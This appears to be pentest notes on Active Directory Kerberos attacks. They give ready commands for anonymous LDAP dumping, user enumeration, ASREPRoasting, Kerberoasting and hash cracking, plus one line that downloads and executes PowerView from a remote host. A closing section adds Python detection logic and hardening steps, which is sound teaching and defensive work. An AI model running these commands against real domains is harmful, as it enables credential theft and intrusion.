# Kerberos

Kerberos is the authentication protocol used by Active Directory, which exposes it alongside LDAP. When these services are reachable we can test for anonymous LDAP binds, enumerate users, and perform the Kerberos attacks described below.

## Anonymous Binds

* When the LDAP and Kerberos ports are open, it is always best practice to check for anonymous binds. When anonymous binds are enabled, we can query the directory for user accounts and the attributes stored on them. Sysadmins sometimes leave a user's password in the account's description field, which is a quick win if anonymous binds are enabled.

```bash
# Anonymous (-x) bind: list the naming contexts to learn the base DN
ldapsearch -h $ip -x -s base namingcontexts
# Dump the whole directory, then only user objects, for offline review
ldapsearch -h $ip -x -b "DC=domain,DC=tld" > ldap-anonymous
ldapsearch -h $ip -x -b "DC=domain,DC=tld" '(objectClass=person)' > ldap-people
```

**Machine:** Cascade - [Here](https://0xdf.gitlab.io/2020/07/25/htb-cascade.html#:~:text=croft%5D%20rid%3A%5B0x46f%5D-,LDAP%20%2D%20TCP%20389,-To%20enumerate%20LDAP)

## Kerberos Attacks

### ASREPRoasting

{% hint style="info" %}
Long story short:

Kerberos authentication works by encrypting a timestamp with the user's password-derived key and sending it to the server (pre-authentication). The server decrypts the timestamp with the user's key and sends back a response, part of which is encrypted with that same key.

This response is known as the AS-REP. For accounts that do not require pre-authentication, it can be requested without knowing the password, and the encrypted part can then be cracked offline to recover the user's password.

*Fully Explained ( Youtube ) :* [*Here*](https://www.youtube.com/watch?v=pZSyGRjHNO4)
{% endhint %}

* Enumerate as many user names as possible
* From the names collected, generate candidate username formats with [username-anarchy](https://github.com/urbanadventurer/username-anarchy)
* From the candidate list, identify which usernames actually exist with [kerbrute](https://github.com/ropnop/kerbrute/releases/tag/v1.0.3)

```bash
kerbrute userenum -d domain.tld usernames.txt | tee kerb.out

# users.txt --> the valid users from kerb.out, one per line (the username part, without @domain.tld)
```

* Once the valid usernames are identified perform `ASREPRoasting`

```bash
impacket-GetNPUsers -usersfile users.txt domain.tld/ -outputfile getnpusers.txt
```

* Crack the obtained hash with hashcat or john to recover the user's password

```bash
hashcat -m 18200 getnpusers.txt /usr/share/wordlists/rockyou.txt
```

### Kerberoasting

{% hint style="info" %}
To perform Kerberoasting, valid domain user credentials or access to a domain-joined machine are required
{% endhint %}

#### From Linux

```bash
# -request asks for a service ticket for every user SPN found and writes the hashes to the output file
impacket-GetUserSPNs domain.tld/username:password -dc-ip $ip -request -outputfile kerberoasting.hash
```

#### From Windows

```powershell
# With PowerView
iex(iwr -uri http://10.10.10.29/PowerView.ps1 -usebasicparsing)
Get-NetUser -SPN

# Rubeus
.\Rubeus.exe kerberoast /outfile:kerberoasting.hash
```

#### Cracking

```bash
hashcat -m 13100 kerberoasting.hash /usr/share/wordlists/rockyou.txt
```
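Detection-side counterpart to the ASREPRoasting and Kerberoasting steps above, added here as an example and not part of the original notes: the KDC logs a 4768 event with Pre-Authentication Type 0 when it issues a TGT without pre-authentication (the AS-REP roasting signal) and a 4769 event per service ticket, so a burst of RC4 (etype 0x17) ticket requests for many distinct user SPNs from one client is the Kerberoasting signal. The event records, field names and burst threshold below are constructed assumptions for illustration.

```python
from collections import defaultdict

RC4_HMAC = "0x17"        # etype requested by classic roasting tools
NO_PREAUTH = "0"         # 4768 PreAuthType 0 = logon without pre-authentication
SPN_BURST_THRESHOLD = 3  # distinct user SPNs per client IP that count as a burst

# Constructed sample 4768/4769 records (not real log data); field names follow
# the Windows security log, but the values are invented for this example.
EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc_backup", "IpAddress": "10.0.0.50",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "alice", "IpAddress": "10.0.0.21",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4769, "ServiceName": "mssql_svc", "IpAddress": "10.0.0.50",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "ServiceName": "http_svc", "IpAddress": "10.0.0.50",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "ServiceName": "ldap_svc", "IpAddress": "10.0.0.50",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "ServiceName": "WS01$", "IpAddress": "10.0.0.21",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
]

def asrep_roast_candidates(events):
    """Accounts that received a TGT without pre-authentication (AS-REP roastable)."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == 4768 and e["Status"] == "0x0"
                   and e["PreAuthType"] == NO_PREAUTH})

def kerberoast_bursts(events, threshold=SPN_BURST_THRESHOLD):
    """Client IPs that pulled RC4 service tickets for many distinct user SPNs.
    Computer accounts ($) and krbtgt are skipped: their keys are random and not
    crackable, so they only add noise to this detection."""
    per_client = defaultdict(set)
    for e in events:
        if e["EventID"] != 4769 or e["Status"] != "0x0":
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        if e["TicketEncryptionType"] == RC4_HMAC:
            per_client[e["IpAddress"]].add(svc)
    return {ip: sorted(s) for ip, s in per_client.items() if len(s) >= threshold}

if __name__ == "__main__":
    print("AS-REP roastable accounts:", asrep_roast_candidates(EVENTS))
    print("Kerberoast bursts:", kerberoast_bursts(EVENTS))
```

The same two checks are the basis for hardening: remove "Do not require Kerberos preauthentication" from the flagged accounts, and move service accounts to long random passwords (or gMSAs) with AES-only encryption types.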
